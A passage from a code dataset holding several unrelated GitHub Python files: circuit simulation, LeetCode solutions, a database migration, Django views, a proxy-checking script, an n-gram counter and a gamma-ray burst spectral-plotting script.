self.wireList[wireIndex]\n if wireIndex == self.gndWireIndex or wireIndex == self.vccWireIndex:\n return\n for t in wire.ctInds:\n self.addWireTransistor (wireIndex, t, group)\n\n def addWireTransistor(self, wireIndex, t, group):\n self.numAddWireTransistor += 1\n other = -1\n trans = self.transistorList[t]\n if trans.gateState == NmosFet.GATE_LOW:\n return\n if trans.side1WireIndex == wireIndex:\n other = trans.side2WireIndex\n if trans.side2WireIndex == wireIndex:\n other = trans.side1WireIndex\n if other == self.vccWireIndex or other == self.gndWireIndex:\n group.add(other)\n return\n if other in group:\n return\n self.addWireToGroup(other, group)\n\n\n def countWireSizes(self, group):\n countFl = 0\n countFh = 0\n for i in group:\n wire = self.wireList[i]\n num = len(wire.ctInds) + len(wire.gateInds)\n if wire.state == Wire.FLOATING_LOW:\n countFl += num\n if wire.state == Wire.FLOATING_HIGH:\n countFh += num\n return [countFl, countFh]\n\n","repo_name":"gregjames/Sim2600","sub_path":"circuitSimulatorUsingSets.py","file_name":"circuitSimulatorUsingSets.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"79"} +{"seq_id":"12174137920","text":"# https://leetcode.com/problems/best-time-to-buy-and-sell-stock/\n\n# assumption: stock price is never negative\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if len(prices) < 2:\n return 0\n\n if len(prices) == 2:\n return max(prices[1] - prices[0], 0)\n\n # greatest element to the right of a given index, for each index\n greatest = [-1 for _ in prices]\n greatest[-1] = -1\n for i in range(len(prices)-2, -1, -1):\n greatest[i] = max(greatest[i+1], prices[i+1])\n\n # and our answer follows\n return max(0, max(g - price for price, g in zip(prices, greatest)))\n\n# simpler: store min price so far, max profit so far\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n min_ = 1e10\n max_ = 0\n for price in prices:\n if price < min_:\n min_ = price\n elif price - min_ > max_:\n max_ = price - min_\n return max_\n","repo_name":"ajnirp/leetcode","sub_path":"easy/single-buy-sell.py","file_name":"single-buy-sell.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18745823992","text":"\"\"\"add colum finish_time in order\n\nRevision ID: 42aa75ed3314\nRevises: 2e4ec4661d34\nCreate Date: 2015-09-06 16:14:58.789045\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '42aa75ed3314'\ndown_revision = '2e4ec4661d34'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('bra_client_order', sa.Column('finish_time', sa.DateTime(), nullable=True))\n op.add_column('bra_douban_order', sa.Column('finish_time', sa.DateTime(), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('bra_douban_order', 'finish_time')\n op.drop_column('bra_client_order', 'finish_time')\n ### end Alembic commands ###\n","repo_name":"giveme168/braavos","sub_path":"migrations/versions/42aa75ed3314_add_colum_finish_time_in_order.py","file_name":"42aa75ed3314_add_colum_finish_time_in_order.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"72256302016","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Category, Product\n\n# Page with Products\ndef ProductList(request, slug=None):\n category = None\n categories = Category.objects.all()\n products = Product.objects.filter(available=True)\n\n if slug:\n category = get_object_or_404(Category, slug=slug)\n products = products.filter(category=category)\n\n\n return render (request, 'product/list.html', {\n 'category' : category,\n 'categories': categories,\n 'products' :products\n })\n\n\n# Page Product\ndef ProductDetail(request,pk):\n product = get_object_or_404(Product, id=pk, available=True)\n\n breadcrumbs_link = product.get_cat_list()\n category_name = [' '.join(i.split('/')[-1].split('-')) for i in breadcrumbs_link]\n breadcrumbs = zip(breadcrumbs_link, category_name)\n return render(request,'product/detail.html',{\n 'product':product,\n 'breadcrumbs': breadcrumbs\n })\n\n\n\n\n\n","repo_name":"Deolg/pythonShop","sub_path":"src/shop/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31437647486","text":"\"\"\"\nurl = www.baidu.com\n验证模块\n\"\"\"\nimport grequests\nfrom utils.redis_utils import smembers_proxy, sadd_proxy, del_proxy\nfrom utils.proxy_main import Main_proxy\nfrom utils.configs import HTTP_UNPROCESSED, HTTPS_UNPROCESSED, DEFAULT_URL, SIZE\nfrom utils.log_pag import logger\n\nhttp_proxy = smembers_proxy(HTTP_UNPROCESSED)\nhttps_proxy = smembers_proxy(HTTPS_UNPROCESSED)\n\nproxy_dict = {\n \"http\": http_proxy,\n \"https\": https_proxy\n}\n\nrequest_s = (grequests.get(url=DEFAULT_URL[key], proxies={key: proxy}, timeout=30) for key, val in proxy_dict.items() for proxy in val) # 异步url请求\n\ndelete_proxy_https = Main_proxy.save_proxy\ndelete_proxy_http = Main_proxy.save_proxy\ninsert_proxy_https = Main_proxy.save_proxy\ninsert_proxy_http = Main_proxy.save_proxy\n\n\ndef exception_handler(request, exception):\n if request.kwargs.get(\"proxies\").get(\"https\"):\n delete_proxy_https.append(request.kwargs.get(\"proxies\").get(\"https\"))\n logger().logger.error(\"[报错代理] {}\".format(request.kwargs.get(\"proxies\").get(\"https\")))\n if request.kwargs.get(\"proxies\").get(\"http\"):\n delete_proxy_http.append(request.kwargs.get(\"proxies\").get(\"http\"))\n logger().logger.error(\"[报错代理] {}\".format(request.kwargs.get(\"proxies\").get(\"http\")))\n\n\nresponse_list = grequests.map(request_s, size=SIZE, exception_handler=exception_handler)\nproxies_list = [response for response in response_list if response and response.status_code == 200]\n\nfor res_text in proxies_list:\n if res_text.raw._pool.proxy.scheme == \"http\":\n insert_proxy_http.append(\"http://\" + res_text.raw._pool.proxy.host+\":\"+str(res_text.raw._pool.proxy.port))\n else:\n insert_proxy_https.append(\"https://\" + res_text.raw._pool.proxy.host+\":\"+str(res_text.raw._pool.proxy.port))\n\n[sadd_proxy(i, \"Processed\") for i in insert_proxy_https]\n[sadd_proxy(i, \"Processed\") for i in insert_proxy_http]\n[sadd_proxy(i, \"Scrapped\") for i in delete_proxy_https]\n[sadd_proxy(i, \"Scrapped\") for i in delete_proxy_http]\n[del_proxy(i)for i in http_proxy]\n[del_proxy(i)for i in https_proxy]\n\nif __name__ == \"__main__\":\n pass","repo_name":"hewm/super_proxy","sub_path":"utils/verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7599123038","text":"import os\nimport pickle\nfrom nltk.util import ngrams\n\n\nclass Ngram:\n\n DOT_DIR = os.environ['HOME'] + '/.pott'\n TXT_DIR = os.environ['HOME'] + '/.pott/txt'\n NGRAM_FILE = os.environ['HOME'] + '/.pott/ngram.pickle'\n\n def __init__(self, max_n=5):\n if not os.path.isdir(self.DOT_DIR):\n os.mkdir(self.DOT_DIR)\n\n if not os.path.isfile(self.NGRAM_FILE):\n self.n_to_ngram = {}\n for n in range(1, max_n):\n self.n_to_ngram[n] = {}\n self._save()\n\n with open(self.NGRAM_FILE, 'rb') as file:\n self.n_to_ngram = pickle.load(file)\n\n def reload(self, paper_by_id):\n os.remove(self.NGRAM_FILE)\n self.__init__()\n for paper in paper_by_id.values():\n print('counting N-gram in \"' + paper.title + '\"')\n with open(self.TXT_DIR + '/' + paper.id + '.txt', 'r') as txt_file:\n self.load(txt_file.read())\n\n def load(self, text):\n for n in self.n_to_ngram.keys():\n for line in text.split('\\n'):\n for ngram in ngrams(line.split(), n):\n ngram = ' '.join(ngram)\n if ngram not in self.n_to_ngram[n]:\n self.n_to_ngram[n][ngram] = 1\n else:\n self.n_to_ngram[n][ngram] += 1\n self._save()\n\n def _save(self):\n with open(self.NGRAM_FILE, mode='wb') as file:\n pickle.dump(self.n_to_ngram, file)\n","repo_name":"jun-harashima/pott","sub_path":"pott/ngram.py","file_name":"ngram.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"30916193591","text":"class Solution:\r\n def divide(self, dividend: int, divisor: int) -> int:\r\n neg = dividend * divisor < 0\r\n dividend = abs(dividend)\r\n divisor = abs(divisor)\r\n if dividend == 0:\r\n return 0\r\n res = 0\r\n current = divisor\r\n pos = 0\r\n while dividend >= current:\r\n current <<= 1\r\n pos+= 1\r\n current >>= 1\r\n print(f\"pos={pos} current={current}\")\r\n for i in range(pos):\r\n if dividend >= current:\r\n dividend -= current\r\n res += 1\r\n res <<= 1\r\n current >>= 1\r\n print(f\"i={i} dividend={dividend} res={res} current={current}\")\r\n res = -(res >> 1) if neg else (res >> 1)\r\n print(res)\r\n return res if -(2**31) <= res <= (2**31-1) else (2**31-1)\r\n\r\nif __name__ == \"__main__\":\r\n s = Solution()\r\n print(s.divide(-2147483648, -1))\r\n","repo_name":"herohunfer/leet2","sub_path":"divide.py","file_name":"divide.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25043972095","text":"\n#!/usr/bin/env python\n\n\n#Code prepared by Khadeejah Motiwala and Saeeda Sajjad\n#2021/07/12\n\nfrom __future__ import print_function\nfrom astropy.io import fits\nimport numpy as np\nimport math as math\nimport matplotlib.pyplot as plt\nfrom pylab import *\nfrom scipy.special import comb\nimport scipy.integrate as si\n#from numpy.core.defchararray import add\n\n\n\n\n#This code is run in the following way.\n#Input: fits file from Rmfit containing the results of spectral fits\n#Output: SED butterfly plot with complete error propagation\n\n\n#Note: This code actually only requires the values of parameters obtained from a spectral fit, the error on the parameters and the covariance matrix. These values are stored in the arrays param_mean, param_err and covariance_matrix respectively. The parameters are ordered according to the Rmfit default order (see comments below). This means that this code can be easily adapted to plot SEDs if the fit parameters, their errors and the covariance matrix is available in some other form.\n\n#Note: To see how the fits file can be obtained from Rmfit, see comments below (one can search for Rmfit).\n\n#Note: The Rmfit file should be named in the following way: BASEMODEL_ADDITIONALCOMPONENT1_ADDITIONALCOMPONENT2_EAC.fit. This means if the spectrum is fitted with the Band model alone the file name should be BAND.fit. If it is fitted with the Band model and an EAC factor is applied, it should be named BAND_EAC.fit. Other examples can be: BAND_BB.fit, BAND_PL.fit, BAND_PL_BB.fit, BAND_PL_BB_EAC.fit\n\n#Note: The base models currently used are CPL, BAND, SBPL. The additional models currently used are PL, BB. More functions can be added if needed.\n\n#Method of use:\n#=============\n#In the INPUT section, give the input parameters, file names etc. See comments in input section.\n\n\n\n#List of models and their parameters in Rmfit\n'''\nFor details look at the file photon_models.ps among rmfit files\nSBPL = Smoothly Broken Power Law\n6 parameters - 4 free - 2 fixed\n1----Amplitude - A - vary photon/(s cm^2 keV)\n2----Pivot E - Epiv - fix at 100 keV\n3----Index1 - lambda1 - vary\n4----Break E - Eb - vary keV\n5----Break scale - Delta - fix at 0.3 decades E\n6----Index2 - lambda2 - vary\n\nBand\n4 parameters\n1----Amplitude - A - vary photon/(s cm^2 keV)\n2----Epeak - vary keV\n3----alpha - vary\n4----beta - vary\n\nCompton\n4 parameters - 3 free - 1 fixed\n1----Amplitude - A - vary photon/(s cm^2 keV)\n2----Epeak - vary keV\n3----Index - vary\n4----Pivot energy - Epiv - fix at 100 keV\n\nPower Law\n3 parameters - 2 free - 1 fixed\n1----Amplitude - A - vary photon/(s cm^2 keV)\n2----Pivot energy - Epiv - fix at 100 keV\n3----Index - vary\n\nBlack Body\n2 parameters\n1----Amplitude - A - vary photon/(s cm^2 keV)\n2----kT - vary (electron energy in keV)\n\nOrder in rmfit\nPL SBPL Band Comptonized BlackBody\n\n'''\n\n#The fits file used is the one obtained from rmfit by going to the Fit Display window then Fit Results -> Write results to file\n#The code can be adapted to reading a covariance matrix and values of parameters and their errors from some other format too.\n\n#allmodel_names=np.asarray(['SBPL','BAND','CPL','PL','BB'])\n#parnumbers=[6,4,4,3,2]\n\n#Parameter names\n#For SBPL\n#parnames=['A_sbpl','Epiv_sbpl','Alpha','Ebreak','Break Scale','Beta']\n#Use symbol definition from Ep.png (from Feraol). It is equivalent to the definition from photon_model.ps (rmfit).\n\n#For Band\n#parnames=['A_band','Epeak_band','alpha','beta']\n\n#For Compton\n#parnames=['A_cpl','Epeak_cpl','Index_cpl','Epiv_cpl']\n\n#For Power Law\n#parnames=['A_pl','Epiv_pl','Index_pl']\n\n#For Black Body\n#parnames=['A_bb','kT']\n\n\n#=================================================================================\n#=========================== FUNCTION DEFINITION =================================\n#=================================================================================\n\n\n\n\n#Functions can be definied in a standalone file which can be called through the following two lines. These should be uncommented if needed. However, in this standalone version, all the functions are defined below, from this point, till the INPUT section. These lines would be present in the function_definitions.py file, if it was being used. The file would have to be in the same folder as this code in order to run the code.\n#with open('function_definitions.py') as infile:\n# exec(infile.read())\n\n\n\n\n\ndef get_model_details(model_name):\n #order of models in rmfit\n rmfitorder=np.array(['PL', 'SBPL', 'BAND', 'CPL', 'BB', 'EAC'])\n #number of parameters in each of these models. I am putting 0 for EAC for now, but I will update this later when the fits file is read.\n rmfit_par_numbers=np.array([3, 6, 4, 4, 2, 0])\n #names of all parameters (model-wise)\n rmfit_parnames=np.array([np.array(['A_pl','Epiv_pl','Index_pl']),\n np.array(['A_sbpl','Epiv_sbpl','alpha_sbpl','Ebreak_sbpl','Delta_sbpl','beta_sbpl']),\n np.array(['A_band','Epeak_band','alpha_band','beta_band']),\n np.array(['A_cpl','Epeak_cpl','Index_cpl','Epiv_cpl']),\n np.array(['A_bb','kT_bb']),\n np.array(['EAC'])],dtype=object)\n rmfit_parfix=np.asarray([np.asarray(['v','f','v']),\n np.asarray(['v','f','v','v','f','v']),\n np.asarray(['v','v','v','v']),\n np.asarray(['v','v','v','f']),\n np.asarray(['v','v'])],dtype=object)\n model_array = np.array(model_name.split('_')) #Get array of models in the original order\n models=np.zeros(model_array.shape[0],dtype='str') #make new empty array of the same length for rmfit order\n #print model_name\n #print 'model_array',model_array\n indices=np.where(np.in1d(rmfitorder,model_array))[0] #Get indices of the models in the original order according to rmfit order\n #print indices\n models=rmfitorder[indices] # new model array\n Nparameters=rmfit_par_numbers[indices] #Array for number of parameters according to rmfit order\n parnames=np.concatenate(rmfit_parnames[indices]) #Array of parameter names according to rmfit order.\n parfix=np.concatenate(rmfit_parfix[indices]) #Array of parameter fix or vary according to rmfit order.\n #print rmfit_parnames[indices]\n #print 'nparnames',parnames\n return models, Nparameters,parnames,parfix\n\n\n\n###################################################################################\n#FUNCTIONS WITH MODEL DEFINITIONS, ERROR CALCULATION, OTHERS\n###################################################################################\n\n\n\n\n\n\ndef fSBPL(E,A,Epiv,alpha,Ebreak,delta,beta):\n Epiv=100.\n delta=0.3\n r=math.log10(E/Ebreak)/delta\n rp=math.log10(Epiv/Ebreak)/delta\n a=1./2.*delta*(beta-alpha)*np.log((np.exp(r)+np.exp(-r))/2.)\n ap=1./2.*delta*(beta-alpha)*np.log((np.exp(rp)+np.exp(-rp))/2.)\n N=A*(E/Epiv)**((alpha+beta)/2.)*10.**(a-ap)\n return N\n\n\n\ndef fBAND(E,Amplitude,Epeak, alpha, beta):\n Ec = (alpha-beta)*Epeak/(2.+alpha)\n if E 700.\n if E/kT >700:\n N=0.\n else:\n N=A*(E**2/(np.exp(E/kT)-1.))\n return N\n\n\n\ndef fPL_err2(E, A, Epiv, index, s2A, s2Epiv, s2index, sAindex):\n f = fPL(E, A, Epiv, index)\n Epiv=100.\n partialA_pl=f/A\n partialEpiv_pl=0.\n partialIndex_pl=f*np.log(E/Epiv)\n err2 = partialA_pl**2*s2A+partialIndex_pl**2*s2index+2.*partialA_pl*partialIndex_pl*sAindex\n return err2, partialA_pl, partialIndex_pl,partialEpiv_pl\n\n\n\ndef fBAND_err2(E, A_band, Epeak, alpha, beta, s2band_A, s2band_Epeak, s2band_alpha, s2band_beta, s_bandAEpeak, s_bandAalpha, s_bandAbeta, s_bandEpeakalpha, s_bandEpeakbeta, s_bandalphabeta):\n Ec = (alpha-beta)*Epeak/(2.+alpha)\n f=fBAND(E, A_band, Epeak, alpha, beta)\n partialA_band = f / A_band\n if E < Ec:\n partialEpeak_band = f * E * (2. + alpha) / Epeak ** 2.\n partialalpha_band = f * ( np.log(E/100.)- E / Epeak )\n partialbeta_band = 0.\n else:\n partialEpeak_band = f * (alpha - beta) / Epeak\n partialalpha_band = f * (np.log(((alpha - beta) * Epeak) / (100. * (2. + alpha))) - (alpha - beta) / (2. + alpha))\n partialbeta_band = f * (np.log(E) - np.log(((alpha - beta) * Epeak) / (2. + alpha)))\n\n err2 = (partialA_band)**2.*s2band_A+(partialEpeak_band)**2*s2band_Epeak+(partialalpha_band)**2.*s2band_alpha+(partialbeta_band)**2.*s2band_beta+2.*(partialA_band*partialEpeak_band*s_bandAEpeak+partialA_band*partialalpha_band*s_bandAalpha+partialA_band*partialbeta_band*s_bandAbeta+partialEpeak_band*partialalpha_band*s_bandEpeakalpha+partialEpeak_band*partialbeta_band*s_bandEpeakbeta+partialalpha_band*partialbeta_band*s_bandalphabeta)\n\n return err2, partialA_band, partialbeta_band, partialalpha_band, partialEpeak_band\n\n\ndef fCPL_err2(E, A, Epeak, index, Epiv, s2A, s2Epeak, s2index, s2Epiv,s_AEpeak, s_Aindex, s_Epeakindex):\n Epiv=100.\n f = fCPL(E, A, Epeak, index, Epiv)\n\n partialA_cpl = f / A\n partialEpeak_cpl = f * (2. + index) * E / Epeak ** 2\n partialIndex_cpl = f * (math.log(E / Epiv) - E / Epeak)\n partialEpiv_cpl=0.\n\n err2 = partialA_cpl ** 2 * s2A + partialEpeak_cpl ** 2 * s2Epeak + partialIndex_cpl ** 2 * s2index + 2.*(partialA_cpl*partialEpeak_cpl*s_AEpeak+partialA_cpl*partialIndex_cpl*s_Aindex+partialEpeak_cpl*partialIndex_cpl*s_Epeakindex)\n\n return err2, partialA_cpl, partialIndex_cpl, partialEpeak_cpl,partialEpiv_cpl\n\n\ndef fBB_err2(E, A, kT, s2A, s2kT, s_AkT):\n f = fBB(E, A, kT)\n # For very small f (less than 1.e304) do not calculate errors. The function is practically zero and so will be its errors. This avoids warnings and nan in the output.\n if f < 1.e304:\n partialA_bb = 0.\n partialkT_bb = 0.\n else:\n partialA_bb = f / A\n partialkT_bb = f * np.exp(E / kT) * E / kT ** 2 * (1. / (np.exp(E / kT) - 1.))\n\n err2 = (partialA_bb) ** 2 * s2A + (partialkT_bb) ** 2 * s2kT + 2.*partialA_bb*partialkT_bb*s_AkT\n\n return err2, partialA_bb, partialkT_bb\n\n\ndef fSBPL_err2(E, A, Epiv, alpha, Ebreak, delta, beta, s2A, s2Epiv, s2alpha, s2Ebreak, s2delta, s2beta, s_alphabeta,s_AEbreak,s_Aalpha, s_Abeta,s_Ebreakalpha, s_Ebreakbeta ):\n f = fSBPL(E, A, Epiv, alpha, Ebreak, delta, beta)\n r = math.log10(E / Ebreak) / delta\n rp = math.log10(Epiv / Ebreak) / delta\n a = 1. / 2. * delta * (beta - alpha) * np.log((np.exp(r) + np.exp(-r)) / 2.)\n ap = 1. / 2. * delta * (beta - alpha) * np.log((np.exp(rp) + np.exp(-rp)) / 2.)\n\n # partial derivative w. r. t. A\n partialA_sbpl = f / A\n partialEbreak_sbpl = f * (beta - alpha)/(2.*Ebreak)*((np.exp(rp)-np.exp(-rp))/(np.exp(rp)+np.exp(-rp))-((np.exp(r)-np.exp(-r))/(np.exp(r)+np.exp(-r))))\n partialalpha_sbpl = f / 2. * (np.log(E/100.)+delta*np.log(10)*(np.log(np.exp(rp)+np.exp(-rp))-np.log(np.exp(r)+np.exp(-r))))\n partialbeta_sbpl = f / 2. * (np.log(E/100.)+delta*np.log(10)*(np.log(np.exp(r)+np.exp(-r))-np.log(np.exp(rp)+np.exp(-rp))))\n partialEpiv_sbpl=0.\n partialdelta_sbpl=0.\n partialDelta_sbpl= partialdelta_sbpl\n\n err2 = partialA_sbpl ** 2 * s2A + partialEbreak_sbpl ** 2 * s2Ebreak + partialalpha_sbpl ** 2 * s2alpha + partialbeta_sbpl ** 2 * s2beta + 2.*(partialA_sbpl*partialEbreak_sbpl*s_AEbreak+partialA_sbpl*partialalpha_sbpl*s_Aalpha+partialA_sbpl*partialbeta_sbpl*s_Abeta+partialEbreak_sbpl*partialalpha_sbpl*s_Ebreakalpha+partialEbreak_sbpl*partialbeta_sbpl*s_Ebreakbeta+partialalpha_sbpl*partialbeta_sbpl*s_alphabeta)\n\n return err2, partialA_sbpl, partialbeta_sbpl, partialalpha_sbpl, partialEbreak_sbpl,partialEpiv_sbpl,partialDelta_sbpl\n\n\n\n\n#=================================================================================\n#========================= END FUNCTION DEFINITIONS =============================\n#=================================================================================\n\n\n\n\n\n\n\n\n\n\n\n\n\n#=================================================================================\n#================================== MAIN ========================================\n#=================================================================================\n\n\n\n#FILE NAMES\n#==========\n\nstr_EAC=''\nif eac:\n str_EAC='_EAC'\nstr_MODEL=model_complete+str_EAC\nstr_file=directory+str_MODEL+'.fit' # 020_GRB130427324 BAND_PL_BB_EAC.fit file\n\n\nstr_modelname=model_complete.replace('_','+')\n#open file\nhdu=fits.open(str_file) # open fits file\n\n#MODEL, COMPONENTS\n#=================\nmodel_components=np.array(model_complete.split('_'))\nbasemodel=model_components[0]\nprint (model_components,basemodel)\n# Get array of models, array of parameter numbers, and array of parameter names in rmfit order.\nmodels,Nparameters,parnames,parfix=get_model_details(model_complete)\nindexmain=np.where(models == basemodel)[0][0] #Find position of main model after reordering models according to rmfit order.\nNparameters_model_only=np.sum(Nparameters) #Total number of parameters in the model.\n#Get number of model components (excluding EAC)\nNcomponents=models.shape[0]\nif models[Ncomponents-1]=='EAC':\n Ncomponents=Ncomponents-1\n\n#Find indices of fixed parameters in this model\nindfix=np.where(parfix=='f')[0]\n#Find indices of variable parameters in this model\nindvary=np.where(parfix=='v')[0]\n\n#Initialise parameter names\nfullparnames=np.full(Nparameters_model_only,' '*40)\nfullparnames_err=np.full(Nparameters_model_only,' '*40)\n\n\n# GET COVARIANCE MATRIX AND MEAN VALUES OF ALL PARAMETERS\n#========================================================\ntmpcovariance_matrix=hdu[2].data.field('COVARMAT') # with EAC\nif tmpcovariance_matrix[0][0].shape[0] != Nparameters_model_only:\n print('Incompatible covariance matrix size - correct for EAC')\ncovariance_matrix=tmpcovariance_matrix[0][0:Nparameters_model_only,0:Nparameters_model_only] # Copy covariance matrix for model parameters only (ignore EAC)\n\n#Replace columns for fixed parameters with zero.\nfor j in indfix:\n covariance_matrix[:,j]=0.\n#Replace rows for fixed parameters with zero.\nfor i in indfix:\n covariance_matrix[i,:]=0. \n covariance_matrix[np.abs(covariance_matrix) < 1.e-18] = 0.\n\n\n#Read parameters values and their erros \nparam_mean=[]\nparam_err=[]\n\nfor ip in range(Nparameters_model_only):\n param_mean.append(hdu[2].data.field('PARAM'+str(ip))[0][0])\n param_err.append(hdu[2].data.field('PARAM'+str(ip))[0][1])\n # strout=parnames[ip].ljust(18)+'= '+str(\"%0.3e\"%param_mean[ip]).rjust(12)+' +/- '+str(\"%0.3e\"%param_err[ip]).rjust(12)+'\\n'\n # fileout.write(strout) \n #print(parnames[ip],'= ',param_mean[ip],'+/-',param_err[ip])\nparam_mean=np.asarray(param_mean)\n\n# Calculate flux, get Epeak array\n#================================\n# empty array for the flux, fluence for each of the simulated model.\nnvect=1\nflux_array=np.zeros(nvect)\nfluence_array=np.zeros(nvect)\nflux_BB_array=np.zeros(nvect)\nflux_bolometric_array=np.zeros(nvect)\nphoton_flux_E=np.zeros(nvect) # photon flux at a given energy Energy_flux_fluence\n\nEpeak_array=np.zeros(nvect)\n\n\n\nvE=np.logspace(E1,E2,10000) #Vector for energies keV\n\nif OPT_plot_limit_vE_highest:\n ie_low=0\n ie_high= np.argwhere(vE >= Emax_highest)[0][0]-1\n \n print(np.argwhere(vE >= Emax_highest))\n print (ie_low, ie_high)\nelse:\n ie_low=0\n ie_high= vE.shape[0]\n#print (ie_low, ie_high)\n \n#exit()\n\n# Initialisations for model\nSED_components=[] # Create list for model component vectors for SED for later plots. This list will be saved in a npy file.\nSED_components.append(vE) #Add energy vector to list to make plots later\nSED_sum=np.zeros(vE.shape) #Create empy numpy array for SED for sum of models\n\nisim=0\n#Loop on models\nip=0 # number of parameters already read\n\nfor ic, component in enumerate(models):\n base=False\n if ic==indexmain:\n base=True\n \n if component=='PL':\n val_A=param_mean[ip]\n val_Epiv=param_mean[ip+1]\n val_Epiv=100.\n val_index=param_mean[ip+2]\n # Calculate flux\n # Call function/calculations\n vfPL = np.vectorize(fPL)\n vvfPL =vfPL(vE,val_A,val_Epiv, val_index)\n SED_PL=vE**2*vvfPL*keVtoErg\n SED_components.append(SED_PL) #Add PL SED to SED components list\n SED_sum=SED_sum + SED_PL\n plt.loglog(vE[ie_low:ie_high],SED_PL[ie_low:ie_high],component_linestyle, linewidth=component_linewidth,c=color10,alpha=0.8)\n\n val_s2A =covariance_matrix[ip,ip]\n val_s2Epiv=covariance_matrix[ip+1,ip+1]\n val_s2index=covariance_matrix[ip+3,ip+3]\n val_sAindex=covariance_matrix[ip, ip+3]\n\n vfPL_err2 = np.vectorize(fPL_err2)\n vvfPL_err2, partialA_pl, partialIndex_pl,partialEpiv_pl = vfPL_err2(vE, val_A, val_Epiv, val_index, val_s2A, val_s2Epiv, val_s2index, val_sAindex)\n\n SED_PL_ERR = vE ** 2 * np.sqrt(vvfPL_err2) * keVtoErg\n SED_PL_high = SED_PL + SED_PL_ERR\n SED_PL_low = SED_PL - SED_PL_ERR\n\n if component=='SBPL':\n val_A=param_mean[ip]\n val_Epiv=param_mean[ip+1]\n val_Epiv=100.\n val_alpha=param_mean[ip+2]\n val_Ebreak=param_mean[ip+3]\n val_delta=param_mean[ip+4]\n val_delta=0.3\n val_beta=param_mean[ip+5]\n #Epeak\n if base: #get rid of this?\n Epeak_array[isim]=val_Ebreak*10**(1./(2.)*val_delta*np.log((val_alpha+2.)/(-val_beta-2.)))\n vfSBPL = np.vectorize(fSBPL)\n vvfSBPL=vfSBPL(vE,val_A,val_Epiv,val_alpha, val_Ebreak, val_delta, val_beta )\n SED_SBPL=vE**2*vvfSBPL*keVtoErg\n SED_components.append(SED_SBPL) #Add PL SED to SED components list\n SED_sum=SED_sum + SED_SBPL\n # plot\n plt.loglog(vE[ie_low:ie_high],SED_SBPL[ie_low:ie_high],component_linestyle, linewidth=component_linewidth,c=color10,alpha=0.8)\n\n val_s2A =covariance_matrix[ip,ip]\n val_s2Epiv =covariance_matrix[ip+1,ip+1]\n val_s2alpha =covariance_matrix[ip+2,ip+2]\n val_s2Ebreak =covariance_matrix[ip+3,ip+3]\n val_s2delta=covariance_matrix[ip+4,ip+4]\n val_s2beta =covariance_matrix[ip+5,ip+5]\n val_s_alphabeta=covariance_matrix[ip+2,ip+5]\n val_s_AEbreak =covariance_matrix[ip,ip+3]\n val_s_Aalpha =covariance_matrix[ip,ip+2]\n val_s_Abeta =covariance_matrix[ip,ip+5]\n val_s_Ebreakalpha=covariance_matrix[ip+2,ip+3]\n val_s_Ebreakbeta=covariance_matrix[ip+3,ip+5]\n vfSBPL_err2 = np.vectorize(fSBPL_err2)\n vvfSBPL_err2, partialA_sbpl, partialbeta_sbpl, partialalpha_sbpl, partialEbreak_sbpl,partialEpiv_sbpl,partialDelta_sbpl = vfSBPL_err2(vE, val_A, val_Epiv, val_alpha, val_Ebreak, val_delta, val_beta, val_s2A, val_s2Epiv, val_s2alpha, val_s2Ebreak, val_s2delta,\n val_s2beta, val_s_alphabeta, val_s_AEbreak, val_s_Aalpha, val_s_Abeta, val_s_Ebreakalpha, val_s_Ebreakbeta)\n\n SED_SBPL_ERR = vE ** 2 * np.sqrt(vvfSBPL_err2) * keVtoErg\n SED_SBPL_high = SED_SBPL + SED_SBPL_ERR\n SED_SBPL_low = SED_SBPL - SED_SBPL_ERR\n\n if component=='BAND':\n val_A=param_mean[ip]\n val_Epeak=param_mean[ip+1]\n val_alpha=param_mean[ip+2]\n val_beta=param_mean[ip+3]\n \n #Epeak\n if base:\n Epeak_array[isim]=val_Epeak\n vfBAND = np.vectorize(fBAND)\n vvfBAND=vfBAND(vE,val_A,val_Epeak,val_alpha, val_beta )\n SED_BAND=vE**2*vvfBAND*keVtoErg\n SED_components.append(SED_BAND) #Add PL SED to SED components list\n SED_sum=SED_sum + SED_BAND\n # plot\n plt.loglog(vE[ie_low:ie_high],SED_BAND[ie_low:ie_high],component_linestyle, linewidth=component_linewidth,c=color10,alpha=0.8)\n\n val_s2band_A=covariance_matrix[ip,ip]\n val_s2band_Epeak=covariance_matrix[ip+1,ip+1]\n val_s2band_alpha=covariance_matrix[ip+2,ip+2]\n val_s2band_beta=covariance_matrix[ip+3,ip+3]\n val_s_bandAEpeak=covariance_matrix[ip,ip+1]\n val_s_bandAalpha=covariance_matrix[ip,ip+2]\n val_s_bandAbeta=covariance_matrix[ip,ip+3]\n val_s_bandEpeakalpha=covariance_matrix[ip+1,ip+2]\n val_s_bandEpeakbeta=covariance_matrix[ip+1,ip+3]\n val_s_bandalphabeta=covariance_matrix[ip+2,ip+3]\n\n vfBAND_err2 = np.vectorize(fBAND_err2)\n vvfBAND_err2, partialA_band, partialbeta_band, partialalpha_band, partialEpeak_band = vfBAND_err2(vE, val_A, val_Epeak, val_alpha, val_beta, val_s2band_A, val_s2band_Epeak, val_s2band_alpha, val_s2band_beta,val_s_bandAEpeak, val_s_bandAalpha, 